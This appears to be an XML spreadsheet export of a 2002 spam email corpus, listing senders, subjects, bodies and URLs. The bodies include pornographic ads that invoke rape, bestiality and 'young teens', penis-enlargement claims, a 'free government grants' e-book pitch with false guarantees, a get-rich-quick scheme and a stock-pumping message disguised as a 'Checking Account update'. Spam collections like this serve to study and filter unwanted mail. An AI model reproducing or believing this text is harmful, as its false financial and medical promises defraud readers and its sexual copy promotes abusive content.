    <t>Dear juanzec , Rape Sex! CLICK HERE ============================================================= Do you like sexy animals doing the wild thing? We have the super hot content on the Internet! This is the site you have heard about. Rated the number one adult site three years in a row! - Thousands of pics from hardcore fucking, and cum shots to pet on girl. - Thousands videos So what are you waiting for? CLICK HERE YOU MUST BE AT LEAST 18 TO ENTER!       To not be on our "in house" address database  CLICK HERE and you will eliminated from future mailings.  [9^":}H&amp;*TG0BK5NKIYs5]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539</t>
  </si>
  <si>
    <t>To: &lt;Undisclosed.Recipients@einstein.ssz.com&gt;\nFrom: "Amy Coniki" &lt;otisdaman@msn.com&gt;\nDate: Thu, 25 Jul 2002 19:44:18 -1600</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 19:44:18 -1600</t>
  </si>
  <si>
    <t>"Amy Coniki" &lt;otisdaman@msn.com&gt;</t>
  </si>
  <si>
    <t>&lt;Undisclosed.Recipients@einstein.ssz.com&gt;</t>
  </si>
  <si>
    <t>GREAT News for Men! NEW Breakthrough!</t>
  </si>
  <si>
    <t>\n\n* * *\n\nWe **won't** lie to you, smaller **IS** better.......  \n.  \n.  \n.  \n.  \n.  \n.  \n.  \n.  \nWhen you're talking about **SUPERCOMPUTERS!**  \n  \n  \nWe HATE to break it to you guys,  \nbut women don't think that way... **  \n  \nIn the REAL WORLD,  \nSize _DOES_ matter. BIG  time!  \n  \n|  **Breakthroughs in Science**  \nhave finally _enabled_ men like you,  \nto take things into their o= wn hands!  \n  \n  \n---  \n  \nMost of our techniques are 21st Century, but some of these techniques  \n= have been around for CENTURIES!  \n  \n_Ancient secrets_ , that only specific tribes, taught their wisest eld= ers.  \n  \nWe reveal ALL of these to you, and more!  \n  \n  \nWhat can our techniques help you accomplish _naturally_?  \n  \nEffectively ADD between 1" to 4.5" to your penis size!  \n_Without_ surgery, pumps, or other painful methods.  \n  \n  \n"I'm convinced, let me get access to these,  \nAM= AZING TECHNIQUES ONLINE!"  \n  \n  \n---  \n  \n  \nEvery man on the _planet_ would like to increase  \nhis penis SIZE and WIDTH, and we can show you how to do BOTH!  \n  \n  \n  \nDon't be Fooled by methods that only increase your LENGTH!  \n  \nInc= rease the LENGTH **and** WIDTH of your penis!  \n  \nSAFELY and NATURALLY  \n  \n---  \n  \n  \n  \n  \n  \n  \n\n* * *  \n  \n\--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507</t>
  </si>
  <si>
    <t>To: &lt;yyyy@netnoteinc.com&gt;\nFrom: "Theresa Brown" &lt;solution244@hotmail.com&gt;\nDate: Thu, 25 Jul 2002 19:06:35</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 19:06:35</t>
  </si>
  <si>
    <t>"Theresa Brown" &lt;solution244@hotmail.com&gt;</t>
  </si>
  <si>
    <t>LOOK!  Desparately Seeking 100 Lazy People....Who Wants To Make Money</t>
  </si>
  <si>
    <t>This is not spam.  Thanks for posting to our promotional web sites. If you \nwish to no longer receive email from us at this email address, or if you feel  \nyou received this email in error please send an email message to \nsolution244@hotmail.com with "Remove" placed in the subject line\n\n\nDear Friend,\n                \nWe are desparately looking for 100 lazy people\nwho wish to make lots of money without working.\n\nWe are not looking for people who are self-motivated.\nWe are not looking for people who join every 'get rich\nquick' scheme offered on the internet.\nWe are not looking for class presidents, beautiful\npeople, career builders or even college graduates.\nWe don't even want union workers or trade school graduates.\n\nWe want the laziest people that exist - the guys and\ngals who expect to make money without lifting a finger.\nWe want the people who stay in bed until noon.\nWe want those of you who think that getting out of bed to go\nlay on the couch is an effort that is best not thought about.\n\nIf you meet this criteria, go to this site and join free:\n\n[URL]http://www.roibot.com[/URL]\n\nIn case you haven't figured it out yet, we want\nthe kind of people who DO NOT take risks.\nIf you are the kind of person who will consider doing\nsomething that's NOT a 'sure thing', then do NOT respond.\nThis is too easy a way to make money\nand there's no challenge in it.\n\nIf you can get to the website, you will be able to see the first home \nbusiness in history that requires no work.  NONE.\n\nBy clicking on this link and going to\nthis website, you will be aknowledging the fact that you\nwant to make enough money that you can quit\nyour regular job and sleep all day.\n\nWe are not looking for a commitment from you\nand we don't even want your money.\nAs a matter of fact, we don't even want you\nto hear from us again if the idea of making lots\nof money without working does not interest you.\n\nSo if nothing else, remember this -\n\nto make money without working for it just\n"Join Free".  Simple as that.\n\n[URL]http://www.roibot.com[/URL] \n\n\nWe look forward to hearing from you.\n\nIn all seriousness,\n\nThis is NOT a "no work" program that will make you money without lifting \na finger. \n\nAdvertising effectively requires WORK and plenty of it. Oh, for sure, it's \nnot like picking cotton under a broiling sun, but it IS work, nonetheless. \n\nAnd we DO want peoples' money ONLY when they see the value of our \nproducts, services and upgrades. \n\nWe look forward to hearing from you. \n\nCordially your lazy friend, \n\nTheresa Brown\n\n\nWe have 10 EXTREMELY TARGETED SAFE-LISTS for you to use daily \nin your advertising campaign! This is spam-free, worry-free advertising at \nits best!\n[URL]http://www.roibot.com[/URL]\n\n \nGet Your Promotion To Prosperity &amp; Peace\nSow A Seed And GOD Will Meet Your Need!\n\nGive To Your Local Charitable Organization\nLife In The Word\nWWW.JOYCEMEYER.ORG\n\nSuccess Begins In The MIND! \n\n***MAKE IT A GREAT DAY***</t>
  </si>
  <si>
    <t>http://www.roibot.com http://www.roibot.com http://www.roibot.com</t>
  </si>
  <si>
    <t>5517</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "IQ - Achievement Group" &lt;ag@insurancemail.net&gt;\nDate: Thu, 25 Jul 2002 19:02:39 -0400</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 19:02:39 -0400</t>
  </si>
  <si>
    <t>"IQ - Achievement Group" &lt;ag@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>Who Do You Trust?</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_42AA1_01C233F9.06BE6710 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Who do you trust?  Jake's Bona-Fide Non-guaranteed UL Universal Life with Iron-Clad Guarantees  Guaranteed Universal Life Portfolio	  	 Guaranteed Death Benefit to Age 120	   	 Single or Survivorship Options Available	   	 Guaranteed Return of Premium	   	 Death Benefit Available for LTC	   	 Single Premium Option for Capital   Transfer/Rescue Plans	   	 A+ Rated Carrier	   	  Call or e-mail one of our regional officers today! Northeast 800-783-6127 Mike McIntire  	 Southeast 800-330-5801 Jerry Cantrell  	 Midwest 866-407-4404 Scott Freeman  	 West 800-352-6388 Dick Lankow  	  ? or ? Please fill out the form below for more information	  Name:	  	 E-mail:	  	 Phone:	  	 City:	  	State:	  	 	  	  	 	   	      We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insurancemail.net[/URL]   Legal Notice    ------=_NextPart_000_42AA1_01C233F9.06BE6710 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Who Do You Trust? =20 =20      =20            =20           =20              =20                   Guaranteed = Death Benefit to Age 120 =20                   Single or = Survivorship Options Available =20                   Guaranteed = Return of Premium =20                   Death = Benefit Available for LTC =20                   Single = Premium Option for Capital                     Transfer/Rescue Plans =20                   A+ Rated = Carrier =20             =20            Call or e-mail one of our regional = officers today! =20                 Northeast 800-783-6127 Mike McIntire Southeast 800-330-5801 Jerry Cantrell Midwest 866-407-4404 Scott Freeman West 800-352-6388 Dick Lankow =20           — or = — =20                  =20                      =20                         Please fill = out the form below for more information =20                         Name: =20                            =20                         E-mail: =20                            =20                         Phone: =20                            =20                         City: =20                            State: =20                            =20                           =20                              =20                                          =20     =20        We = don't want anyone=20         to receive our mailings who does not wish to. This is = professional communication=20         sent to insurance professionals. To be removed from this mailing = list,=20         DO NOT REPLY to this message. Instead, go here: =20         [URL]http://www.Insurancemail.net[/URL] Legal Notice=20 =20 ------=_NextPart_000_42AA1_01C233F9.06BE6710--</t>
  </si>
  <si>
    <t>5518</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: yyyy@netnoteinc.com\nDate: Thu, 25 Jul 2002 18:28:55 -0500</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 18:28:55 -0500</t>
  </si>
  <si>
    <t>Adult Passwords Here</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_1493_212580644306344345450286 Content-Type: text/plain; 	charset=iso-8859-1 Content-Transfer-Encoding: Quoted-Printable **** CELEBRITIES EXPOSED  ****    Jennifer Love Huitt Gets BareNaked!  J-LO Takes Some "Puffy"      No Credit Cards, No Checks  IT'S FREE!   [URL]http://www.free-celebhardcore.com[/URL] ------=_NextPart_1493_212580644306344345450286 Content-Type: text/html; 	charset=iso-8859-1 Content-Transfer-Encoding: Quoted-Printable ad2 CELEBRITIES EXPOSED    Jennifer Love Huitt Gets BareNaked! J-LO Takes Some = "Puffy"    No Credit Cards, No = Checks    IT'S FREE!   CLICK HERE   =  = This email was sent to you by CelebX Mailing Service using verify-send technology.  Your email address is automatically inserted into the To and From headers of this email to eliminate undeliverable emails and excessive net traffic.  If you wish to be removed from this mailing, please use our removal link here ------=_NextPart_1493_212580644306344345450286--</t>
  </si>
  <si>
    <t>http://www.free-celebhardcore.com</t>
  </si>
  <si>
    <t>5514</t>
  </si>
  <si>
    <t>To: &lt;evie@mms.de&gt;\nFrom: set@Flashmail.com\nDate: Thu, 25 Jul 2002 16:43:49 -0400</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 16:43:49 -0400</t>
  </si>
  <si>
    <t>set@Flashmail.com</t>
  </si>
  <si>
    <t>&lt;evie@mms.de&gt;</t>
  </si>
  <si>
    <t>College Coeds                         2915</t>
  </si>
  <si>
    <t>To be taken off this mailing list, simply hit your\nreply button and put "Remove" anywhere in the subject.\n----------------------------------------------------------\n\n\n  If Amateurs is what you want,  Then we Have them.\nTake a look at these HARDCORE sites.  Young HOTTT TEENS !!!\n\nThese are The BEST of the BEST when it comes to Amateurs.\nDon't believe me?   Take a look for yourself.  \n\n\n\n\n  Amateur Petite\n-----------------------\n\nAll Natural TIGHT Coeds !!!\nPetite Natural Breasted Amateurs!!\nExclusive Amateur XXX Videos !!!\nHundreds of Exclusive PETITE Amateur MODELS !!\n\n Click Here to Check Out the ACTION!!!!\n [URL]http://tour2.amateurpetite.com[/URL]\n [URL]http://tour2.amateurpetite.com[/URL]\n\n\n\n\n  Ample Amateurs\n-------------------\n\nBreasts. Women have them, men love them. And for some men (and women!) that old adage\n"The Bigger The Better" holds true! And you'll find PLENTY to hold on to here - Our stable of stacked\nEXCLUSIVE AMPLE AMATEURS will make your mouth water and your hands tired just looking at them!\n\n [URL]http://tour2.ampleamateurs.com[/URL]\n [URL]http://tour2.ampleamateurs.com[/URL]\n\n\n\n\n\n  Amateur Smut\n------------------\n\n The Smuttiest XXX Amateurs on the Web !!!\n Real Amateurs in Explicit Photo Shoots\n 1,000's of HIGH Quality Smut Pics !!!\n\n Pics of "The Horny Girl Next Door"\n Nasty Amateurs Gone WILD!!!\n\n [URL]http://tour1.amateursmut.com[/URL]\n [URL]http://tour1.amateursmut.com[/URL]\n\n\n\n\n-------------------------------------------------------------\nTo be taken off this mailing list, simply hit your\nreply button and put "Remove" anywhere in the subject.</t>
  </si>
  <si>
    <t>http://tour2.amateurpetite.com http://tour2.amateurpetite.com http://tour2.ampleamateurs.com http://tour2.ampleamateurs.com http://tour1.amateursmut.com http://tour1.amateursmut.com</t>
  </si>
  <si>
    <t>5493</t>
  </si>
  <si>
    <t>To: &lt;cypherpunks@einstein.ssz.com&gt;\nFrom: coury@pacbell.net\nDate: Thu, 25 Jul 2002 16:35:53 +0500</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 16:35:53 +0500</t>
  </si>
  <si>
    <t>coury@pacbell.net</t>
  </si>
  <si>
    <t>The Government Grants You $25,000!</t>
  </si>
  <si>
    <t>\n\n#  **  Free Personal and Business Grants**\n\n\n\n##  " Qualify for _at least_ $25,000 in free grants money - Guaranteed! "  \n  \n---  \n  \n###  Each day over One Million Dollars in Free Government  \nGrants  is given away to people just like you for a wide  \nvariety of Business And Personal Needs\n\n        Dear Grant Seeker,\n\n&gt; In a moment, I'll tell you exactly **HOW &amp; WHERE** to get Grants. This\n&gt; **MONEY** has to be given away, **WHY** not to **YOU?**\n\n&gt; You may be thinking, "How can I get some of this Free Grants Money"\n\n&gt; Maybe you think it's impossible to get free money?\n\n&gt; Let me tell you it's not impossible! It's a fact, ordinary people and\n&gt; businesses all across the United States are receiving millions of dollars\n&gt; from these Government and Private Foundation's everyday.\n\n&gt; Who Can Apply?\n\n&gt; **ANYONE** can apply for a Grant from 18 years old and up!\n\n&gt; Grants from $500.00 to $50,000.00 are possible! **GRANTS** don't have to be\n&gt; paid back, **EVER!** Claim your slice of the **FREE** American Pie.\n\n&gt; This money is not a loan, Trying to get money through a conventional bank\n&gt; can be very time consuming and requires a lot of paperwork, only to find out\n&gt; that you've been denied. These Government Agencies don't have to operate\n&gt; under the same stringent requirements that banks do.\n\n&gt; You decide how much money you need, as long as it's a lawful amount and\n&gt; meets with the Government Agencies criteria, the money is yours to keep and\n&gt; never has to be repaid. This money is non taxable &amp; interest free.\n\n&gt; None of these programs require a credit check, collateral, security deposits\n&gt; or co-signers, you can apply even if you have a bankruptcy or bad credit, it\n&gt; doesn't matter, you as a tax payer and U.S. citizen are entitled to this\n&gt; money.\n\n&gt; There are currently over 1,400 Federal Programs, 24,000 State Programs,\n&gt; 30,000 Private Foundations and 20,000 Scholarship Programs available.\n\n&gt; This year over $30 Billion Dollars In Free personal and business Government\n&gt; Grants Money will be given away by Government Grants Agencies.\n\n  \n\n\n###  **Government Personal and Business Grants Facts:**\n\n**Over 20 Million People Get Government Money Every Year:**\n\n1,000,000 entrepreneurs get money to start or expand a business\n\n4,000,000 people get money to invest in real estate\n\n6,000,000 people get money to go to college\n\n10,000,000 people get free help and training for a better job\n\n  \n---  \n  \n##  **Getting Business Grants**\n\n&gt; Anyone thinking about going into business for themselves, or wanting to\n&gt; expand an existing business should rush for the world's largest "one-stop-\n&gt; money-shop" where FREE business grants to start or expand a business is\n&gt; being held for you by the Federal Government.\n\nIt sounds absolutely incredible that people living right here in the United\nStates of America wouldn't know that each year the world's largest source of\nfree business help delivers:\n\nOver $30 billion dollars in free business grants and low-interest loans;\n\nover one-half trillion dollars in procurement contracts; and\n\nover $32 billion dollars in FREE consulting and research grants.\n\n&gt; With an economy that remains unpredictable, and a need for even greater\n&gt; economic development on all fronts, the federal government is more willing\n&gt; than it ever has been before to give you the money you need to own your own\n&gt; business and become your own boss!\n\nIn spite of the perception that people should not look to the government for\nhelp, the great government give-away programs have remained so incredibly huge\nthat if each of the approximately 8 million businesses applied for an equal\nshare, they would each receive over $70,000.\n\nMost people never apply for FREE Business Grants because they somehow feel it\nisn't for them, feel there's too much red-tape, or simply don't know who to\ncontact.The fact is, however, that people from all walks of life do receive\nFREE GRANTS MONEY and other benefits from the government, and you should also.\n\n##  **Government Grants for Personal Need**\n\n&gt; Help to buy a new home for low income families, repair your home, rent,\n&gt; mortgage payments, utility bills, purchase a new car, groceries, childcare,\n&gt; fuel, general living expenses, academic tutoring, clothing, school supplies,\n&gt; housing assistance, legal services, summer camp, debts, music lessons, art\n&gt; lessons, any extracurricular activities, pay bills for senior citizens, real\n&gt; estate taxes, medical expenses and general welfare. If you or someone you\n&gt; know suffered a fire lose there are programs available to help in replacing\n&gt; necessities.\n\n##  Scholarships And Grants For Education\n\n&gt; Grant Money for preschool children and nursery school education, private,\n&gt; primary and secondary schools, men and women to further their education,\n&gt; scholarships for athlete's, business management, engineering, computer\n&gt; science, medical school, undergraduate, graduate, professional, foreign\n&gt; studies and many more.\n\n###  **Here's How You Can Get Free Grants  \nIn The Shortest Time Possible**\n\n&gt; Once you know how and where to apply for a specific Free Grant, results are\n&gt; almost inevitable. The government wants to give away this money. . . it is\n&gt; under congressional mandate to do so! These funds are made available to help\n&gt; you, the tax payer. All that's required from you is the proper presentation\n&gt; of your grant request. That's all.\n\nAnnouncing...\n\n###  **"The Complete Guide To Government Grants"**\n\n&gt; Forget just about everything you've seen or heard about government grants.\n&gt; What I've done is put together a complete blueprint for researching,\n&gt; locating and obtaining government grants. "The Complete Guide To Government\n&gt; Grants" is the most comprehensive tool for obtaining free grant money, and\n&gt; it comes in an Electronic book  \n&gt; (e-book) format, meaning you can download and start using it minutes after\n&gt; you order.\n\n&gt; The Complete Guide to Government Grants will provide you with access to\n&gt; thousands of grant and loan sources, with step by step instructions to\n&gt; proposal writing and contact procedures.\n\nIn the Complete Guide to Government Grants you'll find:\n\n&gt; Step by step guidelines to applying for government grants\n\n&gt; Direct access to over 1,400 grant, loan and assistance programs offered by\n&gt; the U.S. federal government. All you need to do is Click &amp; Find your program\n&gt; from the detailed categorized listings\n\n&gt; Direct access to thousands of resources of state specific grant programs\n\n&gt; Name, phone number and address of an expert in your state that will answer\n&gt; your grant related questions and help you with the grant application... free\n&gt; of charge\n\n&gt; Online directory of government supported venture capital firms\n\n&gt; A unique search tool that will allow you to generate a customized listing of\n&gt; recently announced grant programs\n\n&gt; Government funding programs for small businesses\n\n&gt; Top 100 government programs (based on number of inquiries), discover what\n&gt; are the most sought after government grants and assistant programs. Claim\n&gt; your slice of the **FREE** American Pie\n\n&gt; Online Directory of federal and state resources for government scholarships\n&gt; and grants for education\n\n&gt; Step by step guidelines to locating grants, loans and assistant programs for\n&gt; starting a new business or expanding an existing one\n\n&gt; How to get free small business counseling and expert advice courtesy of the\n&gt; US government\n\n&gt; Government grants application forms\n\n&gt; Direct access to thousands of government grants programs covering: small\n&gt; businesses, home improvement, home buying and homeownership, land\n&gt; acquisition, site preparation for housing, health, assistance and services\n&gt; for the unemployed, job training, federal employment, education, and much\n&gt; much more\n\n&gt; How to develop and write grant proposals that get results\n\n&gt; ...Plus much more\n\n**The Complete Guide to Government Grants is so comprehensive, it provides you\nwith direct access to practically every source of FREE government grants money\ncurrently available.**\n\n&gt; If you're an American citizen or resident, you are entitled to free grant\n&gt; money ranging from $500 to $250,000 or more. If you are Black you have\n&gt; already qualified for 15 programs, being Hispanic, you qualify for many\n&gt; programs. Being a Christian will get you into 20 programs, there are also\n&gt; many other programs available for different faiths, Jewish, Catholic. Not\n&gt; having any money, will get you into over 30 programs, 550 programs if you\n&gt; are unemployed, or underemployed. The list and sources are endless.\n\n&gt; You Are Eligible! This money is Absolutely Free and will be yours to use for\n&gt; any worthwhile purpose.\n\n&gt; Did you know you can apply for as many grants as you want?\n\n&gt; It's true, For instance, you could get a $65,000 grant to begin a weight\n&gt; loss business, get $8,800 in tuition to become a nurse or $35,000 to open up\n&gt; the day-care center, you've always dreamed of owning. And then, go out and\n&gt; apply for a grant to buy a home for you and your family. And once your new\n&gt; business starts doing well you could go out and get another grant for\n&gt; expansion of your business. The possibilities are endless.\n\n  \n\n\n###  You Must Qualify For _At Least_ $25,000 In Free  \nGrants Money, Or Your Money Back!\n\n&gt; We are so confident in our Grants Guide that If you have not received at\n&gt; least $25,000 in free grant money, or, if you are unhappy with our e-book\n&gt; for any reason within the next 12 months, Just send the e-book back and we\n&gt; will refund your entire payment. NO QUESTIONS ASKED!!\n\n&gt; If you want to order, we insist you do so entirely at our risk. That is why\n&gt; the E-book comes with a... **No Risk full year Money-Back Guarantee**. There\n&gt; is absolutely NO RISK on your part with this 365 day guarantee. What we mean\n&gt; is we want you to order without feeling you might "get taken."\n\n&gt; Therefore, we want you to order this material today... read it, use it...\n&gt; and if for any reason you aren't completely satisfied, you not only can\n&gt; cancel, **you should** , for an immediate refund of your purchase price. You\n&gt; simply can't lose.\n\n&gt; **Free Bonuses**\n\n&gt; Just to "sweeten" the deal, I'll include the following **four valuable\n&gt; bonuses** , that you can keep as a gift, even if you later decide not to\n&gt; keep the Grants Guide!\n\n&gt; **Free Bonus #1:**\n\n&gt; **A Fully Featured Grants Writing Tutorial Software Package**\n\n&gt; **THIS INFO ALONE IS WORTH THOUSANDS OF DOLLARS - I GUARANTEE YOU CAN\n&gt; PURCHASE A GRANTS CD OR INFO ANYWHERE, AND YOU WILL NOT RECEIVE THIS\n&gt; DOWNLOADABLE SOFTWARE THAT ACTUALLY SHOWS YOU HOW TO APPLY AND WHAT TO SAY,\n&gt; SO THAT YOU ARE ACCEPTED FOR A GRANT !!!**\n\n&gt; This interactive software tool will walk you through the grant-writing\n&gt; process and will teach you everything you need to know to write competitive\n&gt; grants proposals.\n\n&gt; The program includes:\n\n&gt; detailed information and tips on writing grants proposals;\n\n&gt; how to complete a grant application package;\n\n&gt; examples of good, complete grant packages;\n\n&gt; a glossary of grants terms;\n\n&gt; resources and contacts;\n\n&gt; a mock grants-writing activity where you will be able to compare your\n&gt; results to a successful grant application\n\n&gt; plus much much more\n\n&gt; **Free Bonus #2:**\n\n&gt; **The Insider Information Report: 61 Ways To Save Money**\n\n&gt; This valuable special report contains insider experts tips and techniques\n&gt; that will help you to save thousands of Dollars. You'll discover little\n&gt; known secrets and tricks to saving money on airline fares, car rental, new\n&gt; and used car buying, auto leasing, gasoline, car repairs, auto insurance,\n&gt; life insurance, savings and investment, credit cards, home equity loans,\n&gt; home purchase, major appliances, home heating, telephone services, food\n&gt; purchase, prescription drugs and more.\n\n&gt; **Free Bonus #3:**\n\n&gt; **The Complete Guide To Starting Your Own Business**\n\n&gt; A comprehensive manual that will give you all the guidelines and tools you\n&gt; need to start and succeed in a business of your own, packed with guides,\n&gt; forms, worksheets and checklists. You will be amazed at how simple these\n&gt; strategies and concepts are and how easy it will be for you to apply them to\n&gt; your own business idea. Hundreds were sold separately at $40 each... you get\n&gt; it here for free.\n\n&gt; Here's just a taste of what's in the guide:\n\n&gt; How to determine the feasibility of your business idea. A complete fill in\n&gt; the blanks template system that will help you predict problems before they\n&gt; happen and keep you from losing your shirt on dog business ideas.\n\n&gt; A step by step explanation of how to develop a business plan that will make\n&gt; bankers, prospective partners and investors line up at your door. Plus, a\n&gt; complete ready made business plan template you can easily adapt to your\n&gt; exact needs.\n\n&gt; Discover the easiest, simplest ways to find new products for your business\n&gt; that people are anxious to buy.\n\n&gt; How to make money with your new idea or invention. Secrets of making sure\n&gt; you put cash in your pocket on your very first idea business venture.\n\n&gt; Complete, step by step instructions on how to plan and start a new business.\n&gt; This is must-know must-do information; ignore it and you stand a good chance\n&gt; to fail. You get specifically designed instructions for each of the\n&gt; following: a service business, a retail store, a home based business, a\n&gt; manufacturing company, and more.\n\n&gt; What nobody ever told you about raising venture capital money. Insider\n&gt; secrets of attracting investors, how to best construct your proposal, common\n&gt; mistakes and traps to avoid, and much more.\n\n&gt; Checklist for entering into a partnership. Keeps you from costly mistakes\n&gt; when forming a partnership.\n\n&gt; How to select a franchise business. A step by step guide to selecting a\n&gt; franchise that is best for you.\n\n&gt; A complete step-by-step organized program for cutting costs in your\n&gt; business. Clients of mine have achieved an average of 28% to 35% cost\n&gt; reduction with this technique, and you can too. Keep the money in your\n&gt; pocket with this one!\n\n&gt; What are the secrets behind constructing a results driven marketing plan? I\n&gt; will lead you step by step into developing a marketing plan that will drive\n&gt; your sales through the roof.\n\n&gt; A complete step by step guide guaranteed to help you increase your profits\n&gt; by up to 64%, I call it "The Profit Planning Guide". This is a simple,\n&gt; practical, common sense strategy, but amazingly enough, almost no one\n&gt; understands or uses it.\n\n&gt; **Free Bonus #4:**\n\n&gt; **Guide To Home Business Success**\n\n&gt; This is a fast, no-frills guide to starting and succeeding in a home based\n&gt; business. Here's just a taste of what's in the guide:\n\n&gt; Home business: is it for you?\n\n&gt; What are the secrets behind the people who have million dollar home based\n&gt; businesses? you'll find a 24 tip list proven to turn your home business into\n&gt; a money machine.\n\n&gt; Laws and regulations you must be aware of to avoid legal errors.\n\n&gt; Planning a home based business **-** Insider secrets and tips revealed for\n&gt; ensuring your success in a home business.\n\n&gt; Fundamentals of home business financial planning.\n\n&gt; Simple, easy to copy ideas that will enhance your image - and the response\n&gt; you get from your customers.\n\n&gt; Common problems in starting and managing a home based  business - and how to\n&gt; solve them once and for all.\n\n**Who I Am and Why I'm Qualified to Give**  \n**You The Best Grants Advice Available**\n\n&gt; I'm the president of a leading Internet based information business. I'm also\n&gt; the creator of "The Managing a Small Business CD-ROM" and the author of five\n&gt; books.\n\n&gt; I've been involved in obtaining grants and in small business for the past 23\n&gt; years of my life, as a business coach, a manager of a consulting firm, a\n&gt; seminar leader and as the owner of five successful businesses.\n\n&gt; During my career as a business coach and consultant I've helped dozens of\n&gt; business owners obtain government grants, start their businesses, market,\n&gt; expand, get out of troubles, sell their businesses and do practically every\n&gt; other small business activity you can think of.\n\n&gt; The Guide presented here contains every tip, trick, technique and strategy\n&gt; I've learned during my 23 year career. You practically get my whole brain in\n&gt; a form of an E-book.\n\n**How the Grants Guide is priced?**\n\n&gt; **The Complete Guide To Government Grants** is normally priced at $50,\n&gt; but...\n\n&gt; ... as part of an Online marketing test, if you purchase from this sale you\n&gt; pay only $19.99 (that's 75% off ...plus, you still get the FREE valuable\n&gt; bonuses.)\n\n&gt; **If you are serious about obtaining free grants money, you _need_ this\n&gt; guide. Don't delay a moment longer. Order Now !!! **\n\n**P.S.** The Complete Guide To Government Grants will make a huge difference.\nYou risk nothing. The guide is not the original price of $50, but only $19.99\n( _if you purchase through this sale_ ) and comes with a one year money back\nguarantee. And you get four valuable free bonuses which you may keep\nregardless. Don't delay a moment longer, ORDER NOW !!!!  \n\n\nShipping and Handling is **FREE** since we will email you all of this info via\naccess to our secure website which contains everything described above.  \n\n* * *\n\n Order Now!!! If above link doesn't work, Click Here  \n---  \n  \n  \n  5945CoCw8-467cUcN8670ndsz7-l25 \--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510</t>
  </si>
  <si>
    <t>To: &lt;cinnamon@merit.edu&gt;\nFrom: hotline1714@Flashmail.com\nDate: Thu, 25 Jul 2002 15:47:03 -0400</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 15:47:03 -0400</t>
  </si>
  <si>
    <t>hotline1714@Flashmail.com</t>
  </si>
  <si>
    <t>&lt;cinnamon@merit.edu&gt;</t>
  </si>
  <si>
    <t>I missed you                         24632</t>
  </si>
  <si>
    <t>If Amateurs is what you want,  Then we Have them.\nTake a look at these HARDCORE sites.  Young HOTTT TEENS !!!\n\nThese are The BEST of the BEST when it comes to Amateurs.\nDon't believe me?   Take a look for yourself.  \n\n\n\n\n  Amateur Petite\n-----------------------\n\nAll Natural TIGHT Coeds !!!\nPetite Natural Breasted Amateurs!!\nExclusive Amateur XXX Videos !!!\nHundreds of Exclusive PETITE Amateur MODELS !!\n\n Click Here to Check Out the ACTION!!!!\n [URL]http://tour2.amateurpetite.com[/URL]\n [URL]http://tour2.amateurpetite.com[/URL]\n\n\n\n\n  Ample Amateurs\n-------------------\n\nBreasts. Women have them, men love them. And for some men (and women!) that old adage\n"The Bigger The Better" holds true! And you'll find PLENTY to hold on to here - Our stable of stacked\nEXCLUSIVE AMPLE AMATEURS will make your mouth water and your hands tired just looking at them!\n\n [URL]http://tour2.ampleamateurs.com[/URL]\n [URL]http://tour2.ampleamateurs.com[/URL]\n\n\n\n\n\n  Amateur Smut\n------------------\n\n The Smuttiest XXX Amateurs on the Web !!!\n Real Amateurs in Explicit Photo Shoots\n 1,000's of HIGH Quality Smut Pics !!!\n\n Pics of "The Horny Girl Next Door"\n Nasty Amateurs Gone WILD!!!\n\n [URL]http://tour1.amateursmut.com[/URL]\n [URL]http://tour1.amateursmut.com[/URL]\n\n\n\n\n-------------------------------------------------------------\nTo be taken off this mailing list, simply hit your\nreply button and put "Remove" anywhere in the subject.</t>
  </si>
  <si>
    <t>5530</t>
  </si>
  <si>
    <t>To: &lt;Crittenden@einstein.ssz.com&gt;\nFrom: "Cristine Person" &lt;mikecornwell@myfastmail.com&gt;\nDate: Thu, 25 Jul 2002 15:07:01 -1600</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 15:07:01 -1600</t>
  </si>
  <si>
    <t>"Cristine Person" &lt;mikecornwell@myfastmail.com&gt;</t>
  </si>
  <si>
    <t>&lt;Crittenden@einstein.ssz.com&gt;</t>
  </si>
  <si>
    <t>Take your love life to the next level               ZIB</t>
  </si>
  <si>
    <t>A man endowed with a 7-8" hammer is simply  better equipped than a man with a 5-6"hammer.  Would you rather havemore than enough to get the job done or fall = short. It's totally upto you. Our Methods are guaranteed to increase y= our size by 1-3" Come in here and see how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511</t>
  </si>
  <si>
    <t>To: ravage@einstein.ssz.com\nFrom: totia@acmemail.net\nDate: Thu, 25 Jul 2002 14:54:28 -0500</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 14:54:28 -0500</t>
  </si>
  <si>
    <t>totia@acmemail.net</t>
  </si>
  <si>
    <t>ravage@einstein.ssz.com</t>
  </si>
  <si>
    <t>Checking Account update</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_864650872074 Content-Type: text/plain; 	charset="us-ascii" Content-Transfer-Encoding: 7BIT Special situation trading Advisory Dear Valued subscribers, We sometimes approach our analysts for their thoughts on emerging market sectors we're interested in. On certain occasions, they come to us with intriguing insights of certain aspects of the market that have caught their attention. As you know our track record speaks for itself we are happy to bring you another situation with HUGE upside potential we think this could be the one that when we look back shortly everyone will be saying I should have more. For more info [URL]http://terra.es[/URL] Remember: Nothing Ventured Nothing Gained ------=_NextPart_864650872074 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Dear Reader:  We sometimes approach our analysts for their thoughts on emerging market = sectors we're interested in. On certain occasions, they come to us with = intriguing insights of certain aspects of the market that have caught their = attention. As you know our track record speaks for itself we are happy to bring you = another situation with HUGE upside potential we think this could be the one = that when we look back shortly everyone will be saying I should have more.= For more info CLICK = HERE!!! Remember: Nothing Ventured Nothing Gained 